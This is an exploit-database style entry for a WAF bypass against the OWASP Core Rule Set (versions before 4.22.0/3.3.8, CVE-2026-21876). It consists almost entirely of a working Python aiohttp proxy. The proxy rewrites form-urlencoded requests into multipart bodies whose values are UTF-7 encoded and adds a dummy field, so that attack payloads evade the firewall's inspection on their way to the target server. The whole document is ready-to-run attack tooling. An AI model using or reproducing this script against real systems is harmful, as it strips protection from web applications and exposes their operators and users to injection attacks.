# Exploit Title: coreruleset 4.21.0 - Firewall Bypass
# Date:* 04/08/2026*
# Exploit Author: Daytrift Newgen
# Vendor Homepage: https://github.com/coreruleset
# Software Link: https://github.com/coreruleset/coreruleset
# Version: < 4.22.0/3.3.8
# Tested on: Fedora, MacOS
# CVE : CVE-2026-21876
import base64
import os
from cgi import parse_header
from urllib.parse import parse_qsl
from aiohttp import web, ClientSession, MultipartWriter
from yarl import URL
# Target
UPSTREAM = os.getenv("UPSTREAM", "http://host:8083")
HOP_BY_HOP_HEADERS = {
"connection",
"keep-alive",
"proxy-authenticate",
"proxy-authorization",
"te",
"trailer",
"transfer-encoding",
"upgrade",
}
def _make_upstream_url(request):
base = URL(UPSTREAM)
return str(
base.with_path(request.rel_url.path).with_query(request.rel_url.query)
)
def _copy_headers_for_upstream(request):
headers: dict[str, str] = {}
for k, v in request.headers.items():
lk = k.lower()
if lk in HOP_BY_HOP_HEADERS:
continue
if lk in {"host", "content-length"}:
continue
if lk == "content-type":
continue
headers[k] = v
return headers
def _utf7_encode(text):
result = b""
for char in text:
utf16_bytes = char.encode('utf-16-be')
b64 = base64.b64encode(utf16_bytes).rstrip(b'=')
result += b'+' + b64 + b'-'
return result
def _form_urlencoded_to_multipart(body, content_type):
_, params = parse_header(content_type or "")
charset = params.get("charset", "utf-8")
text = body.decode(charset, errors="replace")
pairs = parse_qsl(text, keep_blank_values=True, strict_parsing=False, encoding=charset, errors="replace")
mp = MultipartWriter("form-data")
for key, value in pairs:
part = mp.append(_utf7_encode(value))
part.headers["Content-Type"] = "text/plain; charset=utf-7"
part.set_content_disposition("form-data", name=key)
part2 = mp.append('a'.encode("utf-8"))
part2.set_content_disposition("form-data", name="aBdC401")
part2.headers["Content-Type"] = "text/plain; charset=utf-8"
return mp, mp.content_type
async def handle(request):
upstream_url = _make_upstream_url(request)
headers = _copy_headers_for_upstream(request)
content_type = request.headers.get("Content-Type", "")
body = await request.read()
data = body
if content_type.startswith("application/x-www-form-urlencoded"):
mp, mp_content_type = _form_urlencoded_to_multipart(body, content_type)
data = mp
headers["Content-Type"] = mp_content_type
async with request.app["session"].request(
method=request.method,
url=upstream_url,
headers=headers,
data=data,
allow_redirects=False,
# proxy="http://127.0.0.1:8080",
) as resp:
resp_body = await resp.read()
response_headers = {
k: v for k, v in resp.headers.items()
if k.lower() not in HOP_BY_HOP_HEADERS
}
return web.Response(
status=resp.status,
headers=response_headers,
body=resp_body,
)
async def on_startup(app):
app["session"] = ClientSession()
async def on_cleanup(app):
await app["session"].close()
app = web.Application(client_max_size=50 * 1024 * 1024)
app.router.add_route("*", "/{tail:.*}", handle)
app.on_startup.append(on_startup)
app.on_cleanup.append(on_cleanup)
if __name__ == "__main__":
# Local proxy
web.run_app(app, host="0.0.0.0", port=8085)